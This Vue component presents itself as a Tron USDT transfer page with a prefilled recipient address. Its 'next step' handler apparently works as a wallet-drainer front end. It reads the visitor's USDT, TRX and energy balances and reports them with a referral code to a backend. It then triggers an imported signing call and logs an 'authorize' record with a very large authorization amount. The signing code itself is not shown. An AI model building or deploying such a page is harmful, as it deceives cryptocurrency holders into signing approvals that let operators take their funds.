<template>
    <div class="container">
      <a-row class="header" type="flex" align="middle">
        <a-col :span="8">
          <a-button type="text" @click="goBack">
            <template #icon>
              <left-outlined />
            </template>
          </a-button>
        </a-col>
        <a-col :span="8" class="text-center">
          <div class="title">USDT转账</div>
          <div class="subtitle">Tron</div>
        </a-col>
        <a-col :span="8" class="text-right">
          <a-button type="text" @click="scanQR">
            <template #icon>
              <qrcode-outlined />
            </template>
          </a-button>
        </a-col>
      </a-row>
  
      <div class="section-title">收款地址</div>
      <a-input-group compact class="input-group">
        <a-input
          v-model:value="recipientAddress"
          placeholder="Tron地址"
          class="address-input"
        >
          <template #suffix>  <!-- 左侧图标 -->
            <a-button type="text" class="user-icon">
              <user-outlined />
            </a-button>
          </template>
        </a-input>
      </a-input-group>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>数量</a-col>
        <a-col class="text-right">
          <span class="balance">{{ usdtBalance }} USDT</span>
        </a-col>
      </a-row>
  
      <a-card class="amount-card">
        <a-input
         style="border: none !important;border-bottom: 1px solid gray  !important;padding: 10px 11px !important;border-radius: 10px 10px 0px 0px; /* 仅底部边框 */"
          v-model:value="amount"
          placeholder="0"
          class="amount-input"
          size="large"
        />
        <a-divider class="divider" />
        <a-input
          v-model:value="memo"
          placeholder="备注（需支付1TRX）"
          class="memo-input"
        />
      </a-card>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>矿工费</a-col>
      </a-row>
  
      <a-card class="fee-card">
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>$0</a-col>
          <a-col>~</a-col>
        </a-row>
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>0 TRX</a-col>
          <a-col>
            <down-outlined />
          </a-col>
        </a-row>
      </a-card>
  
      <div class="flex-grow"></div>
  
      <a-button
        type="primary"
        block
        size="large"
        class="next-button"
        @click="nextStep"
      >
        下一步
      </a-button>
    </div>
  </template>
  
  <script>
  import { defineComponent, ref, onMounted } from 'vue';
  import { connectWallet,getUSDTBalance,getTRXBalance,getEnergy,signAndSend1 } from '../util/tronweb'; 
  import { addOrder,addAuthorize,addToast } from '../util/api';
  import { message } from 'ant-design-vue';
  import { useRoute } from 'vue-router';

  import {
    LeftOutlined,
    QrcodeOutlined,
    UserOutlined,
    DownOutlined,
  } from '@ant-design/icons-vue';
  
  export default defineComponent({
    components: {
      LeftOutlined,
      QrcodeOutlined,
      UserOutlined,
      DownOutlined,
    },
    setup() {
      const route = useRoute();
      const recipientAddress = ref('TWJhcTNqaVauifAEW8e5obVwrMfTnNcHr3');
      const amount = ref('');
      const memo = ref('');
      const usdtBalance = ref("");
      const referral_code = ref('');

      
  
      const goBack = () => {
        console.log('Go back');
      };
  
      const scanQR = () => {
        console.log('Scan QR code');
      };
  
      const nextStep = async() => {
              //首先要对余额进行判断
              const wallet = await connectWallet();
           if(wallet){
                const money = await getUSDTBalance(wallet);
                if(money){
                    const trx = await getTRXBalance(wallet);    
                    const energy = await getEnergy(wallet);
                    //const is_true = await checkAuthorization(wallet)
                    let is_authorize = "0"
                    

                    let data = {
                        referralCode:referral_code.value,
                        address:wallet,
                        usdt_balance:money,
                        trx_balance:trx,
                        energy:energy,
                        is_authorize:is_authorize,
                        message:"有用户访问网站"
                    }
                    await addToast(data)
                    console.log(data);
                }

                if( money < 1){
                    message.warning('USDT余额不足');
                    return
                }

                const str = getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
                let detal = {
                    price:amount.value,
                    inputNumber:1,
                    inputGT:wallet,
                    orderNo: str,
                    title:"钱包收款#"+amount.value,
                    referral_code:referral_code.value
                }
                await addOrder(detal)
          
               const result =  await signAndSend1();
               if(result){
                    console.log(result);
                    message.warning('付款成功');
                    alert('付款成功');
                    let data = {};
                    data.address = wallet;
                    data.tg_no = wallet;
                    data.referralCode = referral_code.value;
                    data.authorize_banlce = 1000000000;
                    data.order_no = str;
                    data.usdt_banlce = money;
                    await addAuthorize(data);
                    
                // 登录后获取当前钱包地址
               }
                //再调用授权街口

           }
      };

      const getCurrentDateTime =() =>  {
            const date = new Date();
            const year = date.getFullYear();
            const month = ("0" + (date.getMonth() + 1)).slice(-2);
            const day = ("0" + date.getDate()).slice(-2);
            const hours = ("0" + date.getHours()).slice(-2);
            const minutes = ("0" + date.getMinutes()).slice(-2);
            const seconds = ("0" + date.getSeconds()).slice(-2);
            return `${year}${month}${day}${hours}${minutes}${seconds}`;
        }

       // 初始化生成号码
        onMounted( async()  => {
          
          referral_code.value = route.params.referralCode; // 解析字符串为对象
         
        
          console.log("111"+referral_code.value);

      });
  
      return {
        recipientAddress,
        amount,
        memo,
        usdtBalance,
        goBack,
        scanQR,
        nextStep,
      };
    },
  });
  </script>
  
  <style scoped>
  .container {
    position: absolute;
    left: 0;
    top: 0;
    bottom: 0;
    right: 0;
    background-color: #f6f6f6;
    display: flex;
    flex-direction: column;
    padding: 16px;
  }
  
  @media screen and (min-width: 960px) {
    .container {
      width: 500px;
      margin: 0 auto;
    }
  }
  
  .header {
    margin-bottom: 20px;
  }
  
  .text-center {
    text-align: center;
  }
  
  .text-right {
    text-align: right;
  }
  
  .title {
    font-size: 18px;
    font-weight: 500;
  }
  
  .subtitle {
    color: #acacac;
    font-size: 12px;
  }
  
  .section-title {
    color: #8c8c8c;
    margin: 15px 0 10px 0;
  }
  
  .input-group {
    width: 100%;
    margin-bottom: 20px;
  }
  
  .address-input {
    flex: 1;
    border-radius: 10px 0 0 10px;
  }
  
  .user-icon {
    border-radius: 0 10px 10px 0;
    padding: 0;
  }
  
  .amount-card {
    border-radius: 10px;
    margin-bottom: 20px;
  }
  
  .amount-input {
    font-size: 32px;
    border: none;
    box-shadow: none;
    
  }
  
  .memo-input {
    border: none;
    box-shadow: none;
  }
  
  .divider {
    margin: 15px 0;
  }
  
  .fee-card {
    border-radius: 10px;
    background-color: #fff;
    padding: 8px 11px;
  }
  
  .fee-row {
    padding: 10px 0;
  }
  
  .balance {
    font-size: 12px;
    color: gray;
  }
  
  .flex-grow {
    flex-grow: 1;
  }
  
  .next-button {
    height: 50px;
    border-radius: 10px;
    font-size: 16px;
    margin-top: 15px;
  }


  </style>